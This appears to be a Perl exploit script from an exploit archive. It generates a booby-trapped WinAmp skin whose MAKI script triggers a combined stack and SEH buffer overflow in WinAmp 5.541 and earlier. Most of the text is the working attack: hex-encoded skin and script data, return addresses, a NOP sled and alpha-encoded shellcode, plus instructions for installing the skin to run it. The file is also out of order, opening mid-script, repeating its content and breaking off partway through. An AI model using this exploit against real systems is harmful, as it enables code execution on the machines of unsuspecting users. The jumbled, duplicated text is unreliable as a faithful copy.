"\x01\x01\x00\x00\x11\x00\x67\x65\x74\x52\x75\x6E\x74\x69\x6D\x65\x56\x65\x72\x73\x69\x6F\x6E";
my $maki_script2 = "\x01\x01\x00\x00\x0B\x00\x67\x65\x74\x53\x6B\x69\x6E\x4E\x61\x6D\x65\x01\x01\x00\x00\x0D\x00\x67\x65\x74\x50\x72\x69\x76\x61\x74".
"\x65\x49\x6E\x74\x01\x01\x00\x00\x0C\x00\x67\x65\x74\x54\x69\x6D\x65\x4F\x66\x44\x61\x79\x01\x01\x00\x00\x0D\x00\x73\x65\x74\x50".
"\x72\x69\x76\x61\x74\x65\x49\x6E\x74\x01\x01\x00\x00\x0A\x00\x6D\x65\x73\x73\x61\x67\x65\x42\x6F\x78\x01\x01\x00\x00\x0F\x00\x69".
"\x6E\x74\x65\x67\x65\x72\x54\x6F\x53\x74\x72\x69\x6E\x67\x01\x01\x00\x00\x0E\x00\x6F\x6E\x53\x63\x72\x69\x70\x74\x4C\x6F\x61\x64".
"\x65\x64\x01\x01\x00\x00\x0E\x00\x67\x65\x74\x53\x63\x72\x69\x70\x74\x47\x72\x6F\x75\x70\x0A\x01\x00\x00\x09\x00\x67\x65\x74\x4F".
"\x62\x6A\x65\x63\x74\x01\x01\x00\x00\x0D\x00\x6F\x6E\x53\x65\x74\x58\x75\x69\x50\x61\x72\x61\x6D\x01\x01\x00\x00\x08\x00\x73\x74".
"\x72\x6C\x6F\x77\x65\x72\x01\x01\x00\x00\x0F\x00\x73\x74\x72\x69\x6E\x67\x54\x6F\x49\x6E\x74\x65\x67\x65\x72\x14\x01\x00\x00\x07".
"\x00\x73\x65\x74\x54\x65\x78\x74\x16\x01\x00\x00\x0B\x00\x73\x65\x74\x58\x6D\x6C\x70\x61\x72\x61\x6D\x14\x01\x00\x00\x0D\x00\x6F".
"\x6E\x54\x65\x78\x74\x43\x68\x61\x6E\x67\x65\x64\x14\x01\x00\x00\x0C\x00\x67\x65\x74\x41\x75\x74\x6F\x57\x69\x64\x74\x68\x14\x01".
"\x00\x00\x0B\x00\x73\x65\x74\x58\x6D\x6C\x50\x61\x72\x61\x6D\x23\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01".
"\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\xFF\xFF\x00".
"\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x88\x13\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x01\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x14\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x16\x01\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x01\x00\x0A\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0D\x00\x00".
"\x00\x07\x00\x00\x00\x0C\x00\x72\x75\x6E\x74\x69\x6D\x65\x63\x68\x65\x63\x6B\x0C\x00\x00\x00\x15\x00\x54\x68\x69\x73\x20\x73\x63".
"\x72\x69\x70\x74\x20\x72\x65\x71\x75\x69\x72\x65\x73\x20\x0D\x00\x00\x00\x1F\x00\x57\x69\x6E\x61\x6D\x70\x20\x35\x2E\x35\x34\x20".
"\x28\x73\x6B\x69\x6E\x20\x76\x65\x72\x73\x69\x6F\x6E\x20\x31\x2E\x33\x34\x29\x0E\x00\x00\x00\x05\x00\x45\x72\x72\x6F\x72\x0F\x00".
"\x00\x00\x00\x00\x11\x00\x00\x00\x05\x00\x44\x45\x42\x55\x47\x18\x00\x00\x00\x04\x00\x74\x65\x78\x74\x19\x00\x00\x00\x05\x00\x6C".
"\x61\x62\x65\x6C\x1A\x00\x00\x00\x04\x00\x6C\x69\x6E\x6B\x1D\x00\x00\x00\x05\x00\x73\x68\x69\x66\x74\x1E\x00\x00\x00\x07\x00\x74".
"\x6F\x6F\x6C\x74\x69\x70\x21\x00\x00\x00\x01\x00\x78\x22\x00\x00\x00\x01\x00\x77\x03\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00".
"\x5F\x01\x00\x00\x00\x00\x00\x00\x0A\x00\x00\x00\xCC\x01\x00\x00\x14\x00\x00\x00\x0F\x00\x00\x00\x7B\x02\x00\x00\x1B\x03\x00\x00".
"\x01\x03\x00\x00\x00\x01\x00\x00\x00\x00\x18\x00\x00\x00\x00\x30\x02\x01\x03\x00\x00\x00\x01\x04\x00\x00\x00\x0C\x01\x03\x00\x00".
"\x00\x01\x05\x00\x00\x00\x0A\x51\x10\xB9\x00\x00\x00\x01\x02\x00\x00\x00\x01\x06\x00\x00\x00\x30\x02\x01\x09\x00\x00\x00\x01\x00".
"\x00\x00\x00\x01\x08\x00\x00\x00\x01\x07\x00\x00\x00\x01\x00\x00\x00\x00\x18\x01\x00\x00\x00\x18\x02\x00\x00\x00\x30\x02\x01\x0A".
"\x00\x00\x00\x01\x00\x00\x00\x00\x18\x03\x00\x00\x00\x30\x02\x01\x0A\x00\x00\x00\x01\x09\x00\x00\x00\x41\x01\x0B\x00\x00\x00\x0C".
"\x01\x09\x00\x00\x00\x01\x0A\x00\x00\x00\x0C\x50\x10\x06\x00\x00\x00\x01\x08\x00\x00\x00\x21\x01\x00\x00\x00\x00\x01\x00\x00\x00".
"\x00\x18\x03\x00\x00\x00\x01\x07\x00\x00\x00\x01\x00\x00\x00\x00\x18\x01\x00\x00\x00\x18\x04\x00\x00\x00\x02\x01\x00\x00\x00\x00".
"\x01\x0F\x00\x00\x00\x01\x06\x00\x00\x00\x01\x0E\x00\x00\x00\x01\x0C\x00\x00\x00\x01\x0D\x00\x00\x00\x40\x18\x05\x00\x00\x00\x02".
"\x01\x08\x00\x00\x00\x21\x01\x06\x00\x00\x00\x21\x01\x01\x00\x00\x00\x21\x03\x10\x00\x00\x00\x01\x00\x00\x00\x00\x01\x0F\x00\x00".
"\x00\x01\x08\x00\x00\x00\x01\x11\x00\x00\x00\x01\x10\x00\x00\x00\x70\x05\x00\x00\x00\x04\x02\x01\x01\x00\x00\x00\x21\x03\x12\x00".
"\x00\x00\x01\x00\x00\x00\x00\x01\x0F\x00\x00\x00\x01\x08\x00\x00\x00\x01\x11\x00\x00\x00\x01\x00\x00\x00\x00\x01\x12\x00\x00\x00".
"\x70\x06\x00\x00\x00\x01\x70\x05\x00\x00\x00\x04\x02\x01\x01\x00\x00\x00\x21\x01\x17\x00\x00\x00\x01\x08\x00\x00\x00\x30\x02\x19".
"\x9C\xFE\xFF\xFF\x11\x06\x00\x00\x00\x01\x01\x00\x00\x00\x21\x01\x16\x00\x00\x00\x01\x00\x00\x00\x00\x70\x08\x00\x00\x00\x00\x30".
"\x02\x01\x13\x00\x00\x00\x01\x16\x00\x00\x00\x01\x18\x00\x00\x00\x70\x09\x00\x00\x00\x01\x30\x02\x01\x14\x00\x00\x00\x01\x16\x00".
"\x00\x00\x01\x19\x00\x00\x00\x70\x09\x00\x00\x00\x01\x30\x02\x01\x15\x00\x00\x00\x01\x16\x00\x00\x00\x01\x1A\x00\x00\x00\x70\x09".
"\x00\x00\x00\x01\x30\x02\x01\x01\x00\x00\x00\x21\x03\x1B\x00\x00\x00\x03\x1C\x00\x00\x00\x01\x02\x00\x00\x00\x10\x06\x00\x00\x00".
"\x01\x01\x00\x00\x00\x21\x01\x00\x00\x00\x00\x01\x1B\x00\x00\x00\x70\x0B\x00\x00\x00\x01\x01\x1D\x00\x00\x00\x08\x10\x17\x00\x00".
"\x00\x01\x17\x00\x00\x00\x01\x00\x00\x00\x00\x01\x1C\x00\x00\x00\x70\x0C\x00\x00\x00\x01\x30\x02\x01\x00\x00\x00\x00\x01\x1B\x00".
"\x00\x00\x70\x0B\x00\x00\x00\x01\x01\x19\x00\x00\x00\x08\x10\x11\x00\x00\x00\x01\x14\x00\x00\x00\x01\x1C\x00\x00\x00\x70\x0D\x00".
"\x00\x00\x01\x02\x01\x00\x00\x00\x00\x01\x1B\x00\x00\x00\x70\x0B\x00\x00\x00\x01\x01\x1A\x00\x00\x00\x08\x10\x16\x00\x00\x00\x01".
"\x15\x00\x00\x00\x01\x1C\x00\x00\x00\x01\x1E\x00\x00\x00\x70\x0E\x00\x00\x00\x02\x02\x01\x01\x00\x00\x00\x21\x03\x1F\x00\x00\x00".
"\x01\x02\x00\x00\x00\x10\x06\x00\x00\x00\x01\x01\x00\x00\x00\x21\x01\x20\x00\x00\x00\x01\x14\x00\x00\x00\x70\x10\x00\x00\x00\x00".
"\x01\x17\x00\x00\x00\x40\x30\x02\x01\x13\x00\x00\x00\x01\x00\x00\x00\x00\x01\x20\x00\x00\x00\x70\x06\x00\x00\x00\x01\x01\x21\x00".
"\x00\x00\x70\x11\x00\x00\x00\x02\x02\x01\x13\x00\x00\x00\x01\x00\x00\x00\x00\x01\x20\x00\x00\x00\x4C\x70\x06\x00\x00\x00\x01\x01".
"\x22\x00\x00\x00\x70\x11\x00\x00\x00\x02\x02\x01\x01\x00\x00\x00\x21\x02\x01\x01\x00\x00\x00\x21\x02\x01\x01\x00\x00\x00\x21\x02".
"\x01\x01\x00\x00\x00\x21\x02\x01\x01\x00\x00\x00\x21\x02\x01\x01\x00\x00\x00\x21\x02\x01\x01\x00\x00\x00\x21";
# win32_exec - EXITFUNC=process CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x48\x49\x49\x49".
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41".
"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x51\x41\x32\x41\x41\x32".
"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x69\x79\x4b\x4c\x4d".
"\x38\x70\x44\x55\x50\x45\x50\x75\x50\x6e\x6b\x77\x35\x67\x4c\x6c".
"\x4b\x43\x4c\x45\x55\x74\x38\x55\x51\x58\x6f\x4e\x6b\x52\x6f\x45".
"\x48\x4e\x6b\x43\x6f\x65\x70\x76\x61\x58\x6b\x50\x49\x4e\x6b\x36".
"\x54\x4e\x6b\x75\x51\x4a\x4e\x56\x51\x6b\x70\x4c\x59\x6c\x6c\x6e".
"\x64\x59\x50\x70\x74\x63\x37\x69\x51\x78\x4a\x56\x6d\x45\x51\x5a".
"\x62\x78\x6b\x6c\x34\x67\x4b\x51\x44\x36\x44\x74\x44\x30\x75\x4d".
"\x35\x6c\x4b\x31\x4f\x31\x34\x65\x51\x5a\x4b\x52\x46\x4c\x4b\x74".
"\x4c\x62\x6b\x6c\x4b\x61\x4f\x77\x6c\x35\x51\x7a\x4b\x6c\x4b\x57".
"\x6c\x4c\x4b\x37\x71\x5a\x4b\x4c\x49\x73\x6c\x77\x54\x47\x74\x38".
"\x43\x50\x31\x6b\x70\x32\x44\x4e\x6b\x61\x50\x66\x50\x4f\x75\x6b".
"\x70\x51\x68\x44\x4c\x6c\x4b\x77\x30\x36\x6c\x6e\x6b\x70\x70\x77".
"\x6c\x6c\x6d\x6c\x4b\x50\x68\x73\x38\x6a\x4b\x74\x49\x6c\x4b\x4b".
"\x30\x4c\x70\x63\x30\x73\x30\x45\x50\x4e\x6b\x45\x38\x35\x6c\x53".
"\x6f\x35\x61\x4c\x36\x75\x30\x71\x46\x6d\x59\x4a\x58\x4b\x33\x4f".
"\x30\x31\x6b\x70\x50\x43\x58\x61\x6e\x6e\x38\x4b\x52\x32\x53\x31".
"\x78\x4c\x58\x4b\x4e\x4c\x4a\x46\x6e\x50\x57\x6b\x4f\x5a\x47\x50".
"\x63\x31\x71\x30\x6c\x35\x33\x44\x6e\x63\x55\x44\x38\x35\x35\x37".
"\x70\x41";
my $overflow1 = "\x41" x 314;
my $overflow2 = "\x41" x 128;
my $overflow3 = "\x90" x 8;
my $sehjmp = "\xeb\x12\x41\x41";
my $sehret = "\x11\x10\xf0\x14"; #0x14f01011 POP, POP, RET WinAmp's aacPlusDecoder.w5s [Universal Address]
my $eip = "\xf8\x99\x01\x12"; #0x120199F8 JMP ESP
my $nopsled = "\x90" x 12;
print "[x] WinAmp <= 5.541 Skin Universal Buffer Overflow Exploit\n";
print "[x] Discovered and Exploited by SkD (skdrat@ hotmail.com)\n";
print "[x] Creating skin dir\n";
rmdir("SkD's Skin");
mkdir("SkD's Skin");
print "[x] Creating skin.xml file\n";
open(my $skin_xml_file, ">SkD's Skin\\skin.xml");
print $skin_xml_file $skin_xml;
close $skin_xml_file;
print "[x] Creating malicious MAKI script\n";
open(my $maki_script_file, ">SkD's Skin\\s.maki");
binmode $maki_script_file;
print $maki_script_file $maki_script1.
$overflow1.$sehjmp.$sehret.$overflow3.$eip.$nopsled.$shellcode.$overflow2.
$maki_script2;
close $maki_script_file;
print "[x] Universal exploit created!\n";
# milw0rm.com [2009-03-05]
#!/usr/bin/perl
#
# WinAmp <= 5.541 Skin Universal Buffer Overflow Exploit
#
# Discovered and Exploited by SkD (skdrat@hotmail.com)
# -----------------------------------------------------
# WinAmp = http://www.winamp.com
#
# Who doesn't use WinAmp?
#
# This was an 0day for sometime but with the release of
# the new version 5.55, it fixed the buffer overflow vuln.
# I made it universal and very reliable.
# The vulnerability is a mixture of a standard buffer overflow
# with a SEH overflow, so to make it more stable,
# both of the scenarios will be exploited accordingly when one
# is triggered with my exploit :).
# The exploit can also run any shellcode (alpha) so this makes
# it ever so useful.
#
# Instructions:-
# -Run script.
# -Copy the created exploit directory "SkD's Skin" to
# "C:\Program Files\WinAmp\Skins" OR just install it.
# -Choose the skin from WinAmp :)
#
# Enjoy it ladies and gents :)
#
# Shouts out to: -KkD
# -InTeL
# -Jayji
# -str0ke
#
# Note: Author has no responsibility over the damage done with this!
use strict;
use warnings;
my $skin_xml = "\xEF\xBB\xBF\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30\x22\x20\x65\x6E\x63\x6F\x64\x69\x6E\x67\x3D".
"\x22\x55\x54\x46\x2D\x38\x22\x20\x73\x74\x61\x6E\x64\x61\x6C\x6F\x6E\x65\x3D\x22\x79\x65\x73\x22\x3F\x3E\x0D\x0A\x0D\x0A\x3C\x57".
"\x69\x6E\x61\x6D\x70\x41\x62\x73\x74\x72\x61\x63\x74\x69\x6F\x6E\x4C\x61\x79\x65\x72\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31".
"\x2E\x33\x34\x22\x3E\x0D\x0A\x09\x3C\x73\x6B\x69\x6E\x69\x6E\x66\x6F\x3E\x0D\x0A\x09\x09\x3C\x76\x65\x72\x73\x69\x6F\x6E\x3E\x31".
"\x2E\x32\x3C\x2F\x76\x65\x72\x73\x69\x6F\x6E\x3E\x0D\x0A\x09\x09\x3C\x6E\x61\x6D\x65\x3E\x42\x65\x6E\x74\x6F\x3C\x2F\x6E\x61\x6D".
"\x65\x3E\x0D\x0A\x09\x09\x3C\x61\x75\x74\x68\x6F\x72\x3E\x53\x6B\x44\x3C\x2F\x61\x75\x74\x68\x6F\x72\x3E\x0D\x0A\x09\x09\x3C\x63".
"\x6F\x6D\x6D\x65\x6E\x74\x3E\x53\x6B\x44\x3C\x2F\x63\x6F\x6D\x6D\x65\x6E\x74\x3E\x0D\x0A\x09\x09\x3C\x65\x6D\x61\x69\x6C\x3E\x73".
"\x6B\x64\x72\x61\x74\x40\x68\x6F\x74\x6D\x61\x69\x6C\x2E\x63\x6F\x6D\x3C\x2F\x65\x6D\x61\x69\x6C\x3E\x0D\x0A\x09\x09\x3C\x73\x63".
"\x72\x65\x65\x6E\x73\x68\x6F\x74\x3E\x53\x6B\x44\x73\x68\x6F\x74\x2E\x70\x6E\x67\x3C\x2F\x73\x63\x72\x65\x65\x6E\x73\x68\x6F\x74".
"\x3E\x0D\x0A\x09\x09\x3C\x68\x6F\x6D\x65\x70\x61\x67\x65\x3E\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x53\x6B\x44\x2E\x63\x6F".
"\x6D\x2F\x3C\x2F\x68\x6F\x6D\x65\x70\x61\x67\x65\x3E\x0D\x0A\x09\x3C\x2F\x73\x6B\x69\x6E\x69\x6E\x66\x6F\x3E\x0D\x0A\x0D\x0A\x09".
"\x3C\x61\x63\x63\x65\x6C\x65\x72\x61\x74\x6F\x72\x73\x20\x73\x65\x63\x74\x69\x6F\x6E\x3D\x22\x67\x65\x6E\x65\x72\x61\x6C\x22\x3E".
"\x0D\x0A\x09\x09\x3C\x61\x63\x63\x65\x6C\x65\x72\x61\x74\x6F\x72\x20\x62\x69\x6E\x64\x3D\x22\x41\x6C\x74\x2B\x46\x22\x20\x61\x63".
"\x74\x69\x6F\x6E\x3D\x22\x4D\x45\x4E\x55\x48\x4F\x54\x4B\x45\x59\x5F\x46\x49\x4C\x45\x22\x20\x2F\x3E\x0D\x0A\x09\x09\x3C\x61\x63".
"\x63\x65\x6C\x65\x72\x61\x74\x6F\x72\x20\x62\x69\x6E\x64\x3D\x22\x41\x6C\x74\x2B\x50\x22\x20\x61\x63\x74\x69\x6F\x6E\x3D\x22\x4D".
"\x45\x4E\x55\x48\x4F\x54\x4B\x45\x59\x5F\x50\x4C\x41\x59\x22\x20\x2F\x3E\x0D\x0A\x09\x09\x3C\x61\x63\x63\x65\x6C\x65\x72\x61\x74".
"\x6F\x72\x20\x62\x69\x6E\x64\x3D\x22\x41\x6C\x74\x2B\x4F\x22\x20\x61\x63\x74\x69\x6F\x6E\x3D\x22\x4D\x45\x4E\x55\x48\x4F\x54\x4B".
"\x45\x59\x5F\x4F\x50\x54\x49\x4F\x4E\x53\x22\x20\x2F\x3E\x0D\x0A\x09\x09\x3C\x61\x63\x63\x65\x6C\x65\x72\x61\x74\x6F\x72\x20\x62".
"\x69\x6E\x64\x3D\x22\x41\x6C\x74\x2B\x49\x22\x20\x61\x63\x74\x69\x6F\x6E\x3D\x22\x4D\x45\x4E\x55\x48\x4F\x54\x4B\x45\x59\x5F\x56".
"\x49\x45\x57\x22\x20\x2F\x3E\x0D\x0A\x09\x09\x3C\x61\x63\x63\x65\x6C\x65\x72\x61\x74\x6F\x72\x20\x62\x69\x6E\x64\x3D\x22\x41\x6C".
"\x74\x2B\x48\x22\x20\x61\x63\x74\x69\x6F\x6E\x3D\x22\x4D\x45\x4E\x55\x48\x4F\x54\x4B\x45\x59\x5F\x48\x45\x4C\x50\x22\x20\x2F\x3E".
"\x0D\x0A\x09\x3C\x2F\x61\x63\x63\x65\x6C\x65\x72\x61\x74\x6F\x72\x73\x3E\x0D\x0A\x0D\x0A\x09\x3C\x61\x63\x63\x65\x6C\x65\x72\x61".
"\x74\x6F\x72\x73\x20\x73\x65\x63\x74\x69\x6F\x6E\x3D\x22\x6E\x6F\x72\x6D\x61\x6C\x22\x3E\x0D\x0A\x09\x09\x09\x3C\x61\x63\x63\x65".
"\x6C\x65\x72\x61\x74\x6F\x72\x20\x62\x69\x6E\x64\x3D\x22\x73\x70\x61\x63\x65\x22\x20\x61\x63\x74\x69\x6F\x6E\x3D\x22\x53\x48\x4F".
"\x57\x5F\x43\x55\x52\x52\x45\x4E\x54\x5F\x54\x52\x41\x43\x4B\x22\x20\x2F\x3E\x0D\x0A\x09\x3C\x2F\x61\x63\x63\x65\x6C\x65\x72\x61".
"\x74\x6F\x72\x73\x3E\x0D\x0A\x0D\x0A\x09\x3C\x21\x2D\x2D\x20\x54\x68\x69\x73\x20\x53\x6B\x69\x6E\x20\x75\x73\x65\x73\x20\x73\x68".
"\x61\x72\x65\x64\x20\x47\x72\x61\x70\x68\x69\x63\x73\x2C\x20\x58\x4D\x4C\x20\x61\x6E\x64\x20\x4D\x61\x6B\x69\x20\x66\x72\x6F\x6D".
"\x20\x27\x42\x69\x67\x20\x42\x65\x6E\x74\x6F\x27\x20\x2D\x2D\x3E\x0D\x0A\x0D\x0A\x09\x3C\x73\x63\x72\x69\x70\x74\x73\x3E\x0D\x0A".
"\x09\x09\x3C\x73\x63\x72\x69\x70\x74\x20\x66\x69\x6C\x65\x3D\x22\x73\x2E\x6D\x61\x6B\x69\x22\x20\x70\x61\x72\x61\x6D\x3D\x22\x73".
"\x6D\x61\x6C\x6C\x22\x2F\x3E\x20\x3C\x21\x2D\x2D\x20\x4D\x75\x73\x74\x20\x62\x65\x20\x6C\x6F\x61\x64\x65\x64\x20\x61\x74\x20\x66".
"\x69\x72\x73\x74\x20\x2D\x2D\x3E\x0D\x0A\x09\x3C\x2F\x73\x63\x72\x69\x70\x74\x73\x3E\x0D\x0A\x0D\x0A\x09\x3C\x69\x6E\x63\x6C\x75".
"\x64\x65\x20\x66\x69\x6C\x65\x3D\x22\x73\x2E\x6D\x61\x6B\x69\x22\x2F\x3E\x0D\x0A\x0D\x0A\x09\x3C\x73\x63\x72\x69\x70\x74\x73\x3E".
"\x0D\x0A\x09\x09\x3C\x73\x63\x72\x69\x70\x74\x20\x66\x69\x6C\x65\x3D\x22\x73\x2E\x6D\x61\x6B\x69\x22\x20\x70\x61\x72\x61\x6D\x3D".
"\x22\x31\x33\x30\x2C\x31\x38\x22\x2F\x3E\x0D\x0A\x09\x3C\x2F\x73\x63\x72\x69\x70\x74\x73\x3E\x0D\x0A\x0D\x0A\x3C\x2F\x57\x69\x6E".
"\x61\x6D\x70\x41\x62\x73\x74\x72\x61\x63\x74\x69\x6F\x6E\x4C\x61\x79\x65\x72\x3E";
my $maki_script1 = "\x46\x47\x03\x04\x17\x00\x00\x00\x27\x00\x00\x00\x71\x49\x65\x51\x87\x0D\x51\x4A\x91\xE3\xA6\xB5\x32\x35\xF3\xE7\x64\x0F\xF5\xD6".
"\xFA\x93\xB7\x49\x93\xF1\xBA\x66\xEF\xAE\x3E\x98\x7B\xC4\x0D\xE9\x0D\x84\xE7\x4A\xB0\x2C\x04\x0B\xD2\x75\xF7\xFC\xB5\x3A\x02\xB2".
"\x4D\x43\xA1\x4B\xBE\xAE\x59\x63\x75\x03\xF3\xC6\x78\x57\xC6\x87\x43\xE7\xFE\x49\x85\xF9\x09\xCC\x53\x2A\xFD\x56\x65\x36\x60\x38".
"\x1B\x46\xA7\x42\xAA\x75\xD8\x3F\x66\x67\xBF\x73\xF4\x7A\x78\xF4\xBB\xB2\xF7\x4E\x9C\xFB\xE7\x4B\xA9\xBE\xA8\x8D\x02\x0C\x37\x3A".
"\xBF\x3C\x9F\x43\x84\xF1\x86\x88\x5B\xCF\x1E\x36\xB6\x5B\x0C\x5D\xE1\x7D\x1F\x4B\xA7\x0F\x8D\x16\x59\x94\x19\x41\x99\xE1\xE3\x4E".
"\x36\xC6\xEC\x4B\x97\xCD\x78\xBC\x9C\x86\x28\xB0\xE5\x95\xBE\x45\x72\x20\x91\x41\x93\x5C\xBB\x5F\xF9\xF1\x17\xFD\x4E\x6D\x90\x60".
"\x7E\x53\x2E\x48\xB0\x04\xCC\x94\x61\x88\x56\x72\xC0\xBC\x3A\x40\x22\x6F\xD6\x4B\x8B\xA4\x10\xC8\x29\x93\x25\x47\x4D\x3E\xAA\x97".
"\xD0\xF4\xA8\x4F\x81\x7B\x0A\xF2\x2A\x45\x49\x83\xFA\xBB\xE4\x64\xF4\x81\xD9\x49\xB0\xC0\xA8\x5B\x2E\xC3\xBC\xFD\x3F\x5E\xB6\x62".
"\x5E\x37\x8D\x40\x8D\xEA\x76\x81\x4A\xB9\x1B\x77\xBE\x97\x4F\xCE\xB0\x77\x19\x4E\x99\x56\xD4\x98\x33\xC9\x6C\x27\x0D\x20\xC2\xA8".
"\xEB\x51\x2A\x4B\xBA\x7F\x5D\x4B\xC6\x5D\x4C\x71\x38\xBA\x1E\x8D\x9E\x48\x3E\x48\xB9\x60\x8D\x1F\x43\xC5\xC4\x05\x40\xC9\x08\x0F".
"\x39\xAF\x23\x4B\x80\xF3\xB8\xC4\x8F\x7E\xBB\x59\x72\x86\xAA\xEF\x0E\x31\xFA\x41\xB7\xDC\x85\xA9\x52\x5B\xCB\x4B\x44\x32\xFD\x7D".
"\x51\x37\x7C\x4E\xBF\x40\x82\xAE\x5F\x3A\xDC\x33\x15\xFA\xB9\x5A\x7D\x9A\x57\x45\xAB\xC8\x65\x57\xA6\xC6\x7C\xA9\xCD\xDD\x8E\x69".
"\x1E\x8F\xEC\x4F\x9B\x12\xF9\x44\xF9\x09\xFF\x45\x27\xCD\x64\x6B\x26\x5A\x4B\x4C\x8C\x59\xE6\xA7\x0C\xF6\x49\x3A\xE4\x05\xCB\x6D".
"\xC4\x8A\xC2\x48\xB1\x93\x49\xF0\x91\x0E\xF5\x4A\xFF\xCF\xDC\xB4\xFE\x81\xCC\x4B\x96\x1B\x72\x0F\xD5\xBE\x0F\xFF\xE1\x8C\xE2\x01".
"\x59\xB0\xD5\x11\x97\x9F\xE4\xDE\x6F\x51\x76\x0A\xBD\xF8\xF0\x80\xA5\x1B\xA6\x42\xA0\x93\x32\x36\xA0\x0C\x8D\x4A\x1B\x34\x2E\x9B".
"\x98\x6C\xFA\x40\x8B\x85\x0C\x1B\x6E\xE8\x94\x05\x71\x9B\xD5\x36\xFD\x03\xF8\x4A\x97\x95\x05\x02\xB7\xDB\x26\x7A\x10\xF2\xD5\x7F".
"\xC4\xAC\xDF\x48\xA6\xA0\x54\x51\x57\x6C\xDC\x76\x35\xA5\xBA\xB5\xB3\x05\xCB\x4D\xAD\xC1\xE6\x18\xD2\x8F\x68\x96\xC1\xFE\x29\x61".
"\xB7\xDA\x51\x4D\x91\x65\x01\xCA\x0C\x1B\x70\xDB\xF7\x14\x95\xD5\x36\xED\xE8\x45\x98\x0F\x3F\x4E\xA0\x52\x2C\xD9\x82\x4B\x3B\x9B".
"\x7A\x66\x0E\x42\x8F\xFC\x79\x41\x15\x80\x9C\x02\x99\x31\xED\xC7\x19\x53\x98\x47\x98\x63\x60\xB1\x5A\x29\x8C\xAA\x4D\xC1\xBB\xE2".
"\xF6\x84\x73\x41\xBD\xB3\xB2\xEB\x2F\x66\x55\x50\x94\x05\xC0\x73\x1F\x96\x1B\x40\x9B\x1B\x67\x24\x27\xAC\x41\x65\x12\x00\x00\x00".
"\x01\x01\x00\x00\x11\x00\x67\x65\x74\x52\x75\x6E\x74\x69\x6D\x65\x56\x65\x72\x73\x69\x6F\x6E";
my $maki_script2 = "\x01\x01\x00\x00\x0B\x00\x67\x65\x74\x53\x6B\x69\x6E\x4E\x61\x6D\x65\x01\x01\x00\x00\x0D\x00\x67\x65\x74\x50\x72\x69\x76\x61\x74".
"\x65\x49\x6E\x74\x01\x01\x00\x00\x0C\x00\x67\x65\x74\x54\x69\x6D\x65\x4F\x66\x44\x61\x79\x01\x01\x00\x00\x0D\x00\x73\x65\x74\x50".
"\x72\x69\x76\x61\x74\x65\x49\x6E\x74\x01\x01\x00\x00\x0A\x00\x6D\x65\x73\x73\x61\x67\x65\x42\x6F\x78\x01\x01\x00\x00\x0F\x00\x69".
"\x6E\x74\x65\x67\x65\x72\x54\x6F\x53\x74\x72\x69\x6E\x67\x01\x01\x00\x00\x0E\x00\x6F\x6E\x53\x63\x72\x69\x70\x74\x4C\x6F\x61\x64".
"\x65\x64\x01\x01\x00\x00\x0E\x00\x67\x65\x74\x53\x63\x72\x69\x70\x74\x47\x72\x6F\x75\x70\x0A\x01\x00\x00\x09\x00\x67\x65\x74\x4F".
